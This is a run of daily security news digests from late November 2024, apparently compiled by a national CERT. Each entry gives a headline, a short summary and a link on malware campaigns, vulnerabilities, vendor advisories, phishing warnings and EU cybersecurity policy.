https://arstechnica.com/security/2024/11/code-found-online-exploits-logofai…
∗∗∗ Copilot: Administrator knowledge for protecting data ∗∗∗
---------------------------------------------
Microsoft has begun rolling out its AI solution Copilot in Microsoft Office applications with "auto opt-in" to customers with the appropriate license. Administrators bear a particular responsibility for protecting data within the company. Microsoft recently published an article with relevant guidance on this.
---------------------------------------------
https://www.borncity.com/blog/2024/12/01/copilot-was-administratoren-zum-sc…
∗∗∗ Cyber Resilience Act: More security for the Internet of Things ∗∗∗
---------------------------------------------
The EU's Cyber Resilience Act is intended to better protect networked devices from attacks from the internet. Companies must implement it by 2027.
---------------------------------------------
https://www.golem.de/news/cyber-resilience-act-mehr-sicherheit-fuer-das-int…
∗∗∗ Digital threats: EU Council approves cyber shield and early warning system ∗∗∗
---------------------------------------------
The EU member states will set up a cybersecurity warning system with which they want to be able to detect and repel threats from the internet in near real time.
---------------------------------------------
https://heise.de/-10185408
∗∗∗ German intelligence launches task force to combat foreign election interference ∗∗∗
---------------------------------------------
Germany's domestic intelligence service (BfV) has created a special task force to counter cyberattacks, espionage, sabotage and disinformation campaigns ahead of federal elections in February.
---------------------------------------------
https://therecord.media/german-bfv-election-task-force-cyberattacks-disinfo…
∗∗∗ Tamanoir: A KeyLogger using eBPF ∗∗∗
---------------------------------------------
Tamanoir is developed for educational purposes only.
---------------------------------------------
https://github.com/pythops/tamanoir
∗∗∗ Webinar: Using smartphones, tablets & co. securely! ∗∗∗
---------------------------------------------
How can I protect my personal data on my smartphone, tablet & co.? In this webinar we show you the most important security settings – from permissions and privacy to screen time. Make your digital devices secure with our experts: Monday, 16 December 2024, 18:30 - 20:00 via Zoom.
---------------------------------------------
https://www.watchlist-internet.at/news/webinar-smartphone-tablet-co-sicher-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (dnsmasq, editorconfig-core, lemonldap-ng, proftpd-dfsg, python3.9, simplesamlphp, tgt, and xfpt), Fedora (qbittorrent, webkitgtk, and wireshark), Mageia (libsoup3 & libsoup), Red Hat (buildah, grafana, grafana-pcp, and podman), SUSE (gimp, kernel, postgresql14, python, webkit2gtk3, xen, and zabbix), and Ubuntu (ansible and postgresql-12, postgresql-14, postgresql-16).
---------------------------------------------
https://lwn.net/Articles/1000465/
∗∗∗ Multiple vulnerabilities in UNIVERGE IX/IX-R/IX-V series routers ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN53958863/
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 28-11-2024 18:00 − Freitag 29-11-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ How to protect yourself from fake shops during the Christmas season! ∗∗∗
---------------------------------------------
At Christmas time, people like to bring joy to their loved ones. With the cold temperatures, it is convenient to shop online from the comfort of home. So that the Christmas joy is not spoiled by an order from a fake shop, we show you the most important points by which you can recognise fraudulent online shops.
---------------------------------------------
https://www.watchlist-internet.at/news/sicher-online-einkaufen-zu-weihnacht…
∗∗∗ After emergency halt: Microsoft distributes corrected Exchange Server updates ∗∗∗
---------------------------------------------
The Exchange update for the November Patchday was faulty, and Microsoft pulled the emergency brake. Corrected security updates are now available.
---------------------------------------------
https://heise.de/-10181645
∗∗∗ High-risk vulnerability in PostgreSQL: GitLab is not patching (yet) ∗∗∗
---------------------------------------------
Postgres has already fixed the vulnerabilities with an update and recommends installing versions 12.21, 13.17, 14.14, 15.9, 16.5 and 17.1 immediately. As in March, readers pointed out to us that GitLab is still sticking with the old, vulnerable versions 14.11 and 16.4 and delaying the updates.
---------------------------------------------
https://heise.de/-10181730
∗∗∗ QR codes on parking ticket machines – police warn of scam ∗∗∗
---------------------------------------------
Manipulated QR codes are currently appearing more frequently on parking ticket machines across Germany. According to the police, this is a scam in which criminals attempt to obtain sensitive data via QR codes – so-called quishing.
---------------------------------------------
https://www.heise.de/-10181611
∗∗∗ EU initiates infringement proceedings against Germany over NIS2 ∗∗∗
---------------------------------------------
At the same time, the Brussels institution has launched further infringement proceedings against 24 member states including Germany because they have not notified it of any national measures implementing the directive on the resilience of critical entities. This is effectively the analogue counterpart of NIS2.
---------------------------------------------
https://heise.de/-10181402
∗∗∗ Ransomware Gangs Seek Pen Testers to Boost Quality ∗∗∗
---------------------------------------------
Qualified applicants must be able to test ransomware encryption and find bugs that might enable defenders to jailbreak the malware.
---------------------------------------------
https://www.darkreading.com/threat-intelligence/ransomware-gangs-seek-pen-t…
∗∗∗ IT threat evolution Q3 2024 ∗∗∗
---------------------------------------------
In this part of the malware report we discuss the most remarkable findings of Q3 2024, including APT and hacktivist attacks, ransomware, stealers, macOS malware and so on.
---------------------------------------------
https://securelist.com/malware-report-q3-2024/114678/
∗∗∗ Race Condition Attacks against LLMs ∗∗∗
---------------------------------------------
In modern LLM systems, there is a lot of code between what you type and what the LLM receives, and between what the LLM produces and what you see. All of that code is exploitable, and I expect many more vulnerabilities to be discovered in the coming year.
---------------------------------------------
https://www.schneier.com/blog/archives/2024/11/race-condition-attacks-again…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (firefox-esr, redis, twisted, and tzdata), Fedora (firefox, nss, pam, rust-rustls, rust-zlib-rs, thunderbird, tuned, and xen), and SUSE (cobbler, kernel, libjxl-devel, libuv, postgresql12, postgresql14, postgresql15, python-waitress, seamonkey, tomcat, and tomcat10).
---------------------------------------------
https://lwn.net/Articles/1000185/
∗∗∗ B&R: 2024-11-29: Cyber Security Advisory - B&R Authentication bypass flaw in several mapp components ∗∗∗
---------------------------------------------
https://www.br-automation.com/fileadmin/SA22P014-90c4aa35.pdf
∗∗∗ Windows Server 2012 Mark of the Web Vulnerability (0day) - and Free Micropatches for it ∗∗∗
---------------------------------------------
https://blog.0patch.com/2024/11/windows-server-2012-mark-of-web.html
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 27-11-2024 18:00 − Thursday 28-11-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Zello asks users to reset passwords after security incident ∗∗∗
---------------------------------------------
Zello is warning customers to reset their passwords if their account was created before November 2nd in what appears to be another security breach.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/zello-asks-users-to-reset-pa…
∗∗∗ Sneaky Skimmer Malware Targets Magento Sites Ahead of Black Friday ∗∗∗
---------------------------------------------
A stealthy JavaScript injection attack steals data from the checkout page of sites, either by creating a fake credit card form or extracting data directly from payment fields.
---------------------------------------------
https://www.darkreading.com/application-security/sneaky-skimmer-malware-mag…
∗∗∗ Microsoft security feature "Administrator Protection" now available to try out ∗∗∗
---------------------------------------------
Microsoft wants to make using Windows more secure. "Administrator Protection" is intended to protect against unauthorised admin access.
---------------------------------------------
https://www.heise.de/-10179558
∗∗∗ Beware of fake parcel notifications ∗∗∗
---------------------------------------------
Expecting a parcel? Caution is advised! Numerous fake notifications about the delivery status of orders are currently circulating. Therefore, check messages from parcel services carefully so as not to fall into a phishing or subscription trap. We show you how to recognise fake messages.
---------------------------------------------
https://www.watchlist-internet.at/news/falsche-paketbenachrichtigungen/
∗∗∗ Malicious NPM Package Exploits React Native Documentation Example ∗∗∗
---------------------------------------------
A recent discovery revealed how official documentation can become an unexpected attack vector for supply chain attacks. It happened when an npm package called “rtn-centered-text” exploited an example from React Native’s Fabric Native Components guide in an attempt to trick developers into downloading their package, putting systems at risk.
---------------------------------------------
https://checkmarx.com/blog/malicious-npm-package-exploits-react-native-docu…
∗∗∗ The Ultimate Handheld Hacking Device - My Experience with NetHunter ∗∗∗
---------------------------------------------
For those unfamiliar, Kali NetHunter is a version of Kali Linux that you can set up on your phone. There are several types of NetHunter setups, each determining the capabilities of your device.
---------------------------------------------
https://andy.codes/blog/security_articles/2024-11-27-the-ultimate-handheld-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security holes in developer tool Jenkins plugged ∗∗∗
---------------------------------------------
In the security advisory, the Jenkins developers list three vulnerable add-ons. The most serious is the vulnerability in the Simple Queue plug-in. It does not escape the names of views. This results in a stored cross-site scripting vulnerability that attackers with "View/Create" permissions can abuse (CVE-2024-54003, CVSS 8.0, risk "high"). The bug is fixed in plug-in version 1.4.5 and newer.
---------------------------------------------
https://heise.de/-10180515
∗∗∗ Multiple Vulnerabilities in Fuji Electric Products ZDI-24-1614 - ZDI-24-1630 ∗∗∗
---------------------------------------------
Mitigation: Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the application.
---------------------------------------------
https://www.zerodayinitiative.com/advisories/published/
∗∗∗ Drupal: Tarte au Citron - Moderately critical - Cross Site Scripting - SA-CONTRIB-2024-064 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-064
∗∗∗ ZABBIX: SQL injection in user.get API (CVE-2024-42327) Critical ∗∗∗
---------------------------------------------
https://support.zabbix.com/browse/ZBX-25623
∗∗∗ NVIDIA Security Bulletin: NVIDIA UFM Enterprise, UFM Appliance, UFM CyberAI - November 2024 ∗∗∗
---------------------------------------------
https://nvidia.custhelp.com/app/answers/detail/a_id/5584
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 26-11-2024 18:05 − Wednesday 27-11-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ RomCom exploits Firefox and Windows zero days in the wild ∗∗∗
---------------------------------------------
ESET Research details the analysis of a previously unknown vulnerability in Mozilla products exploited in the wild and another previously unknown Microsoft Windows vulnerability, combined in a zero-click exploit.
---------------------------------------------
https://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and…
∗∗∗ Fraud on Telegram and WhatsApp with fake job offers ∗∗∗
---------------------------------------------
Below you will find our report on the Telegram scam and how we even managed to outsmart the scammers. We also give tips and tricks on what you can do and how to recognise such a scam.
---------------------------------------------
https://www.zettasecure.com/post/betrug-auf-telegram-und-whatsapp-mit-fake-…
∗∗∗ Critical Flaw in ProjectSend Under Active Exploitation Against Public-Facing Servers ∗∗∗
---------------------------------------------
A critical security flaw impacting the ProjectSend open-source file-sharing application has likely come under active exploitation in the wild, according to findings from VulnCheck. The vulnerability, originally patched over a year-and-a-half ago as part of a commit pushed in May 2023, was not officially made available until August 2024 with the release of version r1720.
---------------------------------------------
https://thehackernews.com/2024/11/critical-flaw-in-projectsend-under.html
∗∗∗ Gaming Engines: An Undetected Playground for Malware Loaders ∗∗∗
---------------------------------------------
Check Point Research discovered a new technique taking advantage of Godot Engine, a popular open-source game engine, to execute crafted GDScript, code which triggers malicious commands and delivers malware. The technique remains undetected by almost all antivirus engines in VirusTotal.
---------------------------------------------
https://research.checkpoint.com/2024/gaming-engines-an-undetected-playgroun…
∗∗∗ New NachoVPN attack uses rogue VPN servers to install malicious updates ∗∗∗
---------------------------------------------
A set of vulnerabilities dubbed "NachoVPN" allows rogue VPN servers to install malicious updates when unpatched Palo Alto and SonicWall SSL-VPN clients connect to them.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-nachovpn-attack-uses-rog…
∗∗∗ Rockstar 2FA Phishing-as-a-Service (PaaS): Noteworthy Email Campaigns ∗∗∗
---------------------------------------------
Welcome to the second part of our investigation into the Rockstar kit; please check out part one here.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rockstar-2f…
∗∗∗ Researchers Discover "Bootkitty" – First UEFI Bootkit Targeting Linux Kernels ∗∗∗
---------------------------------------------
Cybersecurity researchers have shed light on what has been described as the first Unified Extensible Firmware Interface (UEFI) bootkit designed for Linux systems. Dubbed Bootkitty by its creators who go by the name BlackCat, the bootkit is assessed to be a proof-of-concept (PoC) and there is no evidence that it has been put to use in real-world attacks.
---------------------------------------------
https://thehackernews.com/2024/11/researchers-discover-bootkitty-first.html
∗∗∗ BEC-ware the Phish (part 3): Detect and Prevent Incidents in M365 ∗∗∗
---------------------------------------------
This blog discusses a few options in M365, such as guidance on configuring threat and alert policies and how to deal with these alerts downstream in the SIEM.
---------------------------------------------
https://www.pentestpartners.com/security-blog/bec-ware-the-phish-part-3-det…
∗∗∗ Modern solutions against cross-site attacks ∗∗∗
---------------------------------------------
This article is about cross-site leak attacks and what recent defenses have been introduced to counter them. I also want to finally answer the question why web security best practices are always opt-in and finally how YOU can get increased security controls.
---------------------------------------------
https://frederikbraun.de/modern-solutions-xsleaks.html
=====================
= Vulnerabilities =
=====================
∗∗∗ Palo Alto Globalprotect: malicious code vulnerability due to insufficient certificate validation ∗∗∗
---------------------------------------------
The discoverers of the vulnerability at Amberwolf write in their detailed analysis that the Globalprotect VPN clients on both macOS and Windows are susceptible to remote code execution and privilege escalation, namely through the automatic update mechanism (CVE-2024-5921, CVSS-B 7.2, risk "high"). Although the update process requires MSI files to be signed, attackers can abuse the PanGPS service to install a malicious root certificate that is thereby trusted.
---------------------------------------------
https://heise.de/-10178649
∗∗∗ Microsoft patches partly critical vulnerabilities out of band ∗∗∗
---------------------------------------------
On the night leading into Wednesday, Microsoft published four security advisories. [..] Users must install some of the updates themselves.
---------------------------------------------
https://www.heise.de/-10178400
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (mpg123 and php8.2), Fedora (libsndfile, mingw-glib2, mingw-libsoup, mingw-python3, and qbittorrent), Oracle (pam:1.5.1 and perl-App-cpanminus), Red Hat (firefox, thunderbird, and webkit2gtk3), Slackware (mozilla), SUSE (firefox, rclone, tomcat, tomcat10, and xen), and Ubuntu (gh, libsoup2.4, libsoup3, pygments, TinyGLTF, and twisted).
---------------------------------------------
https://lwn.net/Articles/999897/
∗∗∗ GitLab Patch Release: 17.6.1, 17.5.3, 17.4.5 ∗∗∗
---------------------------------------------
https://about.gitlab.com/releases/2024/11/26/patch-release-gitlab-17-6-1-re…
∗∗∗ HPE Insight Remote Support: monitoring software allows code injection ∗∗∗
---------------------------------------------
https://www.heise.de/-10178034
∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2024-0007 ∗∗∗
---------------------------------------------
https://webkitgtk.org/security/WSA-2024-0007.html
∗∗∗ Synology-SA-24:27 DSM ∗∗∗
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_24_27
∗∗∗ Synology-SA-24:26 BeeDrive for desktop ∗∗∗
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_24_26
∗∗∗ Omada Identity: Stored Cross-Site Scripting in Omada Identity ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/stored-xss-in-omada-i…
∗∗∗ F5: K000148716: REXML vulnerability CVE-2024-41123 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148716
∗∗∗ F5: K000148692: Qt vulnerability CVE-2023-34410 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148692
∗∗∗ F5: K000148690: Qt vulnerability CVE-2023-32573 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148690
=====================
= End-of-Day report =
=====================
Timeframe: Monday 25-11-2024 18:00 − Tuesday 26-11-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Hackers exploit critical bug in Array Networks SSL VPN products ∗∗∗
---------------------------------------------
America's Cyber Defense Agency has received evidence of hackers actively exploiting a remote code execution vulnerability in SSL VPN products Array Networks AG and vxAG ArrayOS.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-bug…
∗∗∗ Matrix Unleashes A New Widespread DDoS Campaign ∗∗∗
---------------------------------------------
Aqua Nautilus researchers uncovered a new and widespread Distributed Denial-of-Service (DDoS) campaign orchestrated by a threat actor named Matrix. Triggered by activities detected on our honeypots, this investigation dives deep into Matrix’s methods, targets, tools, and overall goals.
---------------------------------------------
https://blog.aquasec.com/matrix-unleashes-a-new-widespread-ddos-campaign
∗∗∗ Wake up and Smell the BitLocker Keys ∗∗∗
---------------------------------------------
From this demonstration we can see that with a minimal set of tools and a small-time investment it is quite practical to access a drive encrypted with BitLocker. [..] This type of attack can be avoided by implementing a second factor for pre-boot authentication, either a user PIN and/or USB Startup Key.
---------------------------------------------
https://blog.nviso.eu/2024/11/26/wake-up-and-smell-the-bitlocker-keys/
∗∗∗ Detection Opportunities — EDR Silencer, EDRSandblast, Kill AV… ∗∗∗
---------------------------------------------
There are many ways to disable or modify security solutions, which you can, e.g., test with at least 53 different Atomic Red Team as a starting point, but today I would like to limit myself to a few tools that successful ransomware groups use within the top 20 ransomware groups for October 2024.
---------------------------------------------
https://detect.fyi/detection-opportunities-edr-silencer-edrsandblast-kill-a…
∗∗∗ Web security: Content Security Policy against cross-site scripting, part 2 ∗∗∗
---------------------------------------------
Advanced CSP directives help to protect applications efficiently against cross-site scripting.
---------------------------------------------
https://heise.de/-10175246
∗∗∗ Graykey: decryption tool can partially unlock iOS 18 ∗∗∗
---------------------------------------------
In connection with Apple's new reboot protection against unlocking, information has surfaced about what forensics companies can do with current iPhones.
---------------------------------------------
https://heise.de/-10175639
=====================
= Vulnerabilities =
=====================
∗∗∗ Dell Wyse Management Suite: attackers can bypass security mechanisms ∗∗∗
---------------------------------------------
According to an advisory, DoS attacks (CVE-2024-49595, "high") are conceivable, among other things; in addition, attackers can bypass security mechanisms that are not described in detail (CVE-2024-49597, "high"). In both cases, attacks are possible remotely, but attackers already need high user privileges.
---------------------------------------------
https://www.heise.de/-10176009
∗∗∗ Trellix: update seals security vulnerabilities in Enterprise Security Manager ∗∗∗
---------------------------------------------
Trellix does not go into detail about specific vulnerabilities. However, Trellix ESM 11.6.13 updates Azul Java, among other things, and thereby addresses several unlisted CVEs. The bundled libcurl library likewise fixes two vulnerabilities (CVE-2023-38545, CVSS 9.8, risk "critical"; CVE-2023-38546, CVSS 3.7, low). Two "reverse shell" vulnerabilities also previously lurked in the "Snow Service" (CVE-2024-1148, CVSS 9.8, critical; CVE-2024-11482 [not yet public]).
---------------------------------------------
https://www.heise.de/-10176250
∗∗∗ WordPress plug-in Anti-Spam by Cleantalk puts 200,000 sites at risk ∗∗∗
---------------------------------------------
Unauthenticated attackers can thereby install and activate arbitrary plug-ins on vulnerable WordPress instances and thus ultimately execute arbitrary code (CVE-2024-10542, CVSS 9.8, risk "critical").
---------------------------------------------
https://heise.de/-10175993
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (pypy3), Fedora (chromium, cobbler, and libsoup3), Oracle (kernel), SUSE (glib2, govulncheck-vulndb, javapackages-tools, xmlgraphics-batik, xmlgraphics-commons, xmlgraphics-fop, libblkid-devel, opentofu, php8, postgresql, postgresql16, postgresql17, thunderbird, traefik, and ucode-intel), and Ubuntu (needrestart and rapidjson).
---------------------------------------------
https://lwn.net/Articles/999744/
∗∗∗ WordPress Plugin "WP Admin UI Customize" vulnerable to cross-site scripting ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN87182660/
∗∗∗ VMware: VMSA-2024-0022: VMware Aria Operations updates address multiple vulnerabilities(CVE-2024-38830, CVE-2024-38831, CVE-2024-38832, CVE-2024-38833, CVE-2024-38834) ∗∗∗
---------------------------------------------
https://support.broadcom.com/web/ecx/support-content-notification/-/externa…
∗∗∗ Mozilla Security Advisories November 26, 2024 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/
∗∗∗ Splunk: SVD-2024-1102: Third-Party Package Updates in Splunk Machine Learning Toolkit - November 2024 ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1102
∗∗∗ Splunk: SVD-2024-1101: Third-Party Package Updates in Python for Scientific Computing - November 2024 ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1101
∗∗∗ Synology-SA-24:25 Surveillance Station ∗∗∗
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_24_25
∗∗∗ Synology-SA-24:15 BeeFiles ∗∗∗
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_24_15
∗∗∗ Hitachi Energy RTU500 Scripting Interface ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-331-05
∗∗∗ Hitachi Energy MicroSCADA Pro/X SYS600 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-331-04
∗∗∗ F5: K000148713: libssh2 vulnerabilities CVE-2019-3858 and CVE-2019-3862 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148713
∗∗∗ PHP Patches Multiple Vulnerabilities Including CVE-2024-8932 ∗∗∗
---------------------------------------------
https://thecyberthrone.in/2024/11/26/php-patches-multiple-vulnerabilities-i…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 22-11-2024 18:00 − Monday 25-11-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ NAS unusable: Qnap withdraws faulty security update ∗∗∗
---------------------------------------------
Owners of NAS devices from manufacturer Qnap have problems logging in after installing a patch. So far, only a downgrade helps. [..] Qnap has now published a statement on the update problem. According to it, they have now repaired and re-released the security patch QTS 5.2.2.2950 build 20241114.
---------------------------------------------
https://heise.de/-10146878
∗∗∗ Nearest Neighbor Attack: attack via the neighbour's Wi-Fi ∗∗∗
---------------------------------------------
That critical systems could be reached via the target's guest Wi-Fi was because one of them was reachable both via wired Ethernet and via the guest Wi-Fi. This eliminated MFA; it was apparently a misconfiguration.
---------------------------------------------
https://heise.de/-10129358
∗∗∗ Researchers Uncover Malware Using BYOVD to Bypass Antivirus Protections ∗∗∗
---------------------------------------------
Cybersecurity researchers have uncovered a new malicious campaign that leverages a technique called Bring Your Own Vulnerable Driver (BYOVD) to disarm security protections and ultimately gain access to the infected system. [..] The starting point of the attack is an executable file (kill-floor.exe) that drops the legitimate Avast Anti-Rootkit driver, which is subsequently registered as a service using Service Control (sc.exe) to perform its malicious actions.
---------------------------------------------
https://thehackernews.com/2024/11/researchers-uncover-malware-using-byovd.h…
∗∗∗ Microsoft testing Windows 11 support for third-party passkeys ∗∗∗
---------------------------------------------
Microsoft is now testing WebAuthn API updates that add support for using third-party passkey providers for Windows 11 passwordless authentication.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/microsoft-testing-windows-11…
∗∗∗ Decrypting a PDF With a User Password, (Sat, Nov 23rd) ∗∗∗
---------------------------------------------
In diary entry "Analyzing an Encrypted Phishing PDF", I decrypted a phishing PDF document. Because the PDF was encrypted for DRM (owner password), I didn't have to provide a password. What happens if you try this with a PDF encrypted for confidentiality (user password), where a password is needed to open the document?
---------------------------------------------
https://isc.sans.edu/diary/rss/31466
∗∗∗ Finding vulnerabilities in ClipSp, the driver at the core of Windows’ Client License Platform ∗∗∗
---------------------------------------------
ClipSP (clipsp.sys) is a Windows driver used to implement client licensing and system policies on Windows 10 and 11 systems. Cisco Talos researchers have discovered eight vulnerabilities related to clipsp.sys ranging from signature bypass to elevation of privileges and sandbox escape: TALOS-2024-1964 (CVE-2024-38184), TALOS-2024-1965 (CVE-2024-38185)
---------------------------------------------
https://blog.talosintelligence.com/finding-vulnerabilities-in-clipsp-the-dr…
∗∗∗ Dozens of Machines Infected: Year-Long NPM Supply Chain Attack Combines Crypto Mining and Data Theft ∗∗∗
---------------------------------------------
The package, @0xengine/xmlrpc, began its life as a “legitimate” XML-RPC implementation in October 2023, but strategically transformed into a malicious tool in later versions and has remained active through November of 2024. This discovery serves as a stark reminder that a package’s longevity and consistent maintenance history do not guarantee its safety.
---------------------------------------------
https://checkmarx.com/blog/npm-supply-chain-attack-combines-crypto-mining-a…
∗∗∗ Secure coding: CWE-377, getting TOCTOU race conditions under control ∗∗∗
---------------------------------------------
TOCTOU vulnerabilities are among the most serious of those described in the Common Weakness Enumeration CWE-377. [..] The key to avoiding these vulnerabilities lies in eliminating the gap between the time of check and the time of use, typically by using atomic file creation methods, such as those of secure APIs like File.createTempFile() or Files.createTempFile().
---------------------------------------------
https://heise.de/-10081613
∗∗∗ Phishing warning: criminals abuse the Black Friday rush ∗∗∗
---------------------------------------------
In the Phishing-Radar, the consumer advice centres warn that fraudulent e-mails have been circulating since Friday claiming that unknown accesses to the account would lead to a temporary suspension of the account.
---------------------------------------------
https://heise.de/-10143500
∗∗∗ Advanced threat predictions for 2025 ∗∗∗
---------------------------------------------
Kaspersky's Global Research and Analysis Team monitors over 900 APT (Advanced Persistent Threat) groups and operations. In this piece of the KSB series, we review the advanced threat trends from the past year and offer insights into what we can expect in 2025.
---------------------------------------------
https://securelist.com/ksb-apt-predictions-2025/114582/
∗∗∗ Webinar: Internet crime - fraud traps & fakes on the internet ∗∗∗
---------------------------------------------
This webinar informs you about common fraud traps on the internet (subscription traps, fake shops, classified ad fraud, scamming & co.) and shows how you can recognise them. Participate free of charge: Monday, 9 December 2024, 18:30 - 20:00 via Zoom.
---------------------------------------------
https://www.watchlist-internet.at/news/webinar-internetkriminalitaet-betrug…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (ansible, chromium, ghostscript, glib2.0, intel-microcode, and kernel), Fedora (dotnet9.0, needrestart, php, and python3.6), Oracle (cups, kernel, osbuild-composer, podman, python3.12-urllib3, squid, and xerces-c), Red Hat (buildah, edk2, gnome-shell, haproxy, kernel, kernel-rt, libvpx, pam, python3.11-urllib3, python3.12-urllib3, qemu-kvm, rhc-worker-script, squid:4, and tigervnc), Slackware (php), SUSE (chromedriver, chromium, dcmtk, govulncheck-vulndb, iptraf-ng, and traefik2), and Ubuntu (linux-oracle and openjdk-23).
---------------------------------------------
https://lwn.net/Articles/999597/
∗∗∗ UmweltOffice: SQL Injection in Siempelkamp NIS UmweltOffice <7.4.3 (SYSS-2024-074) ∗∗∗
---------------------------------------------
https://www.syss.de/pentest-blog/sql-injection-in-siempelkamp-nis-umweltoff…
∗∗∗ F5: K000148495: libssh vulnerability CVE-2023-1667 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148495
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 21-11-2024 18:00 − Friday 22-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Ransomgroup Helldown: Attacks on Zyxel Devices ∗∗∗
---------------------------------------------
SEC Consult has observed a rise of attacks on Zyxel firewalls over the past two months affecting Zyxel ATP firewall (version 5.38 and above - i.e. we have seen successful attacks also on fully patched Zyxel ATP version 5.39 firewalls). [..] We write this blogpost to highlight the need to remain vigilant and monitor activity on the Zyxel Firewalls, especially since there seems to be no official patch from the vendor as of the time of this blog post.
---------------------------------------------
https://sec-consult.com/blog/detail/ransomgroup-helldown-attacks-on-zyxel-d…
∗∗∗ Attacks on Citrix security vulnerability observed ∗∗∗
---------------------------------------------
Last week, Citrix closed security vulnerabilities in Session Recording. Now IT researchers have observed attacks on them.
---------------------------------------------
https://www.heise.de/-10100614
∗∗∗ Fintech Giant Finastra Investigating Data Breach ∗∗∗
---------------------------------------------
Finastra, which provides software and services to 45 of the world's top 50 banks, notified customers of the security incident after a cybercriminal began selling more than 400 gigabytes of data purportedly stolen from the company.
---------------------------------------------
https://it.slashdot.org/story/24/11/21/2043251/fintech-giant-finastra-inves…
∗∗∗ Here's what happens if you don't layer network security – or remove unused web shells ∗∗∗
---------------------------------------------
The US Cybersecurity and Infrastructure Agency often breaks into critical organizations' networks – with their permission, of course – to simulate real-world cyber attacks and thereby help improve their security. [..] In a Thursday blog post, the Agency (CISA) detailed the exercise and opined they "illuminate lessons learned for network defenders and software manufacturers about how to respond to and reduce risk." In other words: give it a read and learn from this critical infrastructure organization's mistakes – and the things it did well – to keep real criminals out of your IT environment.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/11/22/cisa_red_tea…
∗∗∗ Lateral Movement on macOS: Unique and Popular Techniques and In-the-Wild Examples ∗∗∗
---------------------------------------------
We uncover macOS lateral movement tactics, such as SSH key misuse and AppleScript exploitation. Strategies to counter this attack trend are also discussed.
---------------------------------------------
https://unit42.paloaltonetworks.com/unique-popular-techniques-lateral-movem…
∗∗∗ UK drinking water supplies disrupted by record number of undisclosed cyber incidents ∗∗∗
---------------------------------------------
A record number of cyber incidents impacted Britain’s critical drinking water supplies this year without being publicly disclosed, according to information obtained by Recorded Future News.
---------------------------------------------
https://therecord.media/uk-drinking-water-infrastructure-cyber-incident-rep…
∗∗∗ A Bag of RATs: VenomRAT vs. AsyncRAT ∗∗∗
---------------------------------------------
Remote access tools (RATs) have long been a favorite tool for cyber attackers, since they enable remote control over compromised systems and facilitate data theft, espionage, and continuous monitoring of victims. Among the well-known RATs are VenomRAT and AsyncRAT. [..] This comparison explores the core technical differences between VenomRAT and AsyncRAT by analyzing their architecture, capabilities, and tactics.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/11/21/a-bag-of-rats-venomrat-vs-async…
∗∗∗ Looking at the Attack Surfaces of the Kenwood DMX958XR IVI ∗∗∗
---------------------------------------------
In our previous Kenwood DMX958XR blog post, we detailed the internals of the Kenwood in-vehicle infotainment (IVI) head unit and provided annotated pictures of each PCB. In this post, we aim to outline the attack surface of the DMX958XR in the hopes of providing inspiration for vulnerability research.
---------------------------------------------
https://www.thezdi.com/blog/2024/11/20/looking-at-the-attack-surfaces-of-th…
=====================
= Vulnerabilities =
=====================
∗∗∗ QNAP Security Advisories 2024-11-23 ∗∗∗
---------------------------------------------
QNAP released 8 security advisories: 5x important, 3x moderate
---------------------------------------------
https://www.qnap.com/en-us/security-advisories
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
